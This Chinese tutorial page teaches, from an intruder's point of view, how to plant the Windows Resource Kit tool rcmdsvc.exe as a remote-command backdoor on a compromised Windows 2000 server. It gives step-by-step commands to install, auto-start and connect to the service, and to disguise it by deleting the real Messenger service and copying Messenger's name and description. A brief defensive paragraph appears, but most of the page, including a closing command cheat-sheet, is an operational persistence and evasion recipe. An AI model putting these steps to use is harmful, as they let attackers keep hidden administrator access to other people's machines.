首页 > 软件教程 / 正文
rcmdsvc.exe是Windows 2000 Resource Kit中的一个小工具,是用来开启Remote Command Service服务的。这个服务开启的端口是445,与Windows 2000系统的Microsoft-DS服务开的端口一样。因为是Microsoft发布的服务,所以根本没有杀毒 软件会认为这是病毒或者木马,因此不少入侵者都把这个服务作为入侵后的后门使用。
下面将从入侵者的角度讲一下这个服务的安装、使用方法以及如何伪装成另外一个服务,从而让大家知道该如何防范。
rcmdsvc.exe安装
假设服务器被入侵后,入侵者把以后需要用到的rcmdsvc.exe等一些工具都放到了C盘根目录下,在cmd窗口里输入:rcmdsvc -install,回车后,即可看到Remote Command Service服务安装成功的提示,
这时在“控制面板”→“管理工具”→“服务”里,就可以看到这个服务了。
从图1可以看到该服务并没有启动,还需要我们来启动该服务,可以使用系统自带的net命令,在cmd窗口里输入:net start rcmdsvc,回车,我们可以看到Remote Command Service服务开始启动和成功。
rcmdsvc.exe使用方法
下面我们就可以用Windows 2000 Resource Kit中的rcmd.exe小工具进行远程连接了,并且连接后拥有管理员权限,可以添加管理员用户。
rcmdsvc.exe伪装
下面该sc.exe(Service Control的缩写)出场了,这个工具是在命令行方式下管理系统中的服务的,在Windows 2000 Resource Kit或者Windows XP中都可以找到该工具。来看一下sc.exe是如何把Remote Command Service服务伪装成Messenger这个服务的。
1.删除Messenger服务。在cmd窗口里输入:sc delete Messenger,回车,可以看到命令完成。
2.把Remote Command Service服务改名为Messenger,在进行这步前,需要重新启动一下。在cmd窗口里输入:sc config rcmdsvc DisplayName= Messenger,回车,可以看到命令完成。这时候我们到“控制面板”→“管理工具”→“服务”里,就可以看到Remote Command Service服务名变成了Messenger。但是“描述”的内容为空。为了使这个服务看起来更“合法”,我们把Messenger的“描述”也加上,在cmd窗口里输入:sc description rcmdsvc 发送和接收系统管理员或者“警报器”服务传递的消息。我们到“服务”里就可以看到rcmdsvc的“描述”被加上了Messenger的描述。只不过服务名称还是rcmdsvc。
3.再重新用net start命令启动一下rcmdsvc服务,就可以用rcmd.exe进行连接了。
为了避免电脑被入侵,把不需要的服务都关闭掉,经常检查一下开启的服务和端口,如果您经过检查发现您的电脑有rcmdsvc服务,或者该服务被伪装成了别的服务,那就要小心了,说明电脑很可能被入侵了,并被别人安装上了杀毒 软件无法查出的“合法”后门
rcmdsvc.exe使用方法:
1、rcmdsvc /install //安装后的服务名为:Remote Command Service (rcmdsvc),建议上传至windows目录
怎么用命令行改服务名和描述:
sc 127.0.0.1 query rcmdsvc //查询整个服务
sc 127.0.0.1 qdescription rcmdsvc //查询服务的描述
sc 127.0.0.1 description rcmdsvc "管理和编录可移动媒
体并操作自动化可移动媒体设备。如果这个服务被停止,依赖可移动存储的程序,如备份和
远程存储将放慢速度。如果禁用这个服务,所有专依赖这个服务的服务将无法启动。" //修改服务的描述
D:pt007fPstools2.11>psservice 127.0.0.1 setconfig rcmdsvc auto //设置服务为自动启动
2、net start rcmdsvc
3、rcmd 127.0.0.1 ver
- 上一篇:SC.exe使用完全指南
- 下一篇:加速人生轻松为电脑提速
猜你喜欢
留言与评论(共有 0 条评论) |
- 搜索
-
- 11-08美图秀秀专业版
- 08-01微信公众号引流技巧
- 08-01喜马拉雅《听书稿》入门书写教学_快速赚钱
- 08-01零基础玩转公众号教程
- 08-01网易新闻谷歌市场版
- 08-01学美容按摩必看教程
- 08-01二维码生成器精简版
- 07-18腾讯电脑管家账号包找回的好处及功能介绍
- 07-18DBA VMware虚拟机安装和简介(安装多个虚拟主机学习数据库备份)
- 07-18系统输入法如何添加删除及排序?
- 1909℃系统清理软件 Cleaning Suite pro 免费安装及激活教程
- 444℃苹果短信备份软件ImTOO iPhone SMS Backup中文安装及激活教程(附补丁+软件)
- 381℃美图秀秀专业版
- 225℃Office2016专业增强版永久激活详细方法(附2021年最新激活密钥及下载地址)
- 211℃数据恢复软件O&O MediaRecovery Professional注册图文教程(附注册码+软件下载
- 161℃TuneFab WeTrans的使用教程:在iOS设备和PC/iOS设备之间传输音乐
- 150℃如何使用小丸工具箱对视频进行x264压制 小丸工具箱压制教程
- 147℃Office 2013完美激活码与官方原版简体中文下载地址(超全)
- 143℃菜鸟必看 一步一步教你安装驱动程序
- 139℃学美容按摩必看教程
- 标签列表
-
- 百度盘 (438)
- 合集 (415)
- 视频 (395)
- 身材 (348)
- 美女 (284)
- 网红 (255)
- 颜值 (252)
- 1V (246)
- 资源 (246)
- 作品 (175)
- 主播 (174)
- 转载搬运 (160)
- 女神 (152)
- 百度云 (147)
- 妹子 (147)
- 斗鱼 (144)
- 高颜值 (119)
- 推特 (118)
- 下载 (114)
- 精选 (109)
- 黑丝 (100)
- 粉丝 (97)
- 直播 (97)
- 阿里云盘 (95)
- 自拍 (95)
- OnlyFans (91)
- 微博 (87)
- P站 (87)
- 快手 (85)
- 抖音 (84)
- 虎牙 (82)
- 某推 (81)
- 大长腿 (81)
- 小姐姐 (79)
- 剧情 (78)
- 私拍 (75)
- 原画 (73)
- 美少女 (71)
- 自行打包 (68)
- 有尺度 (67)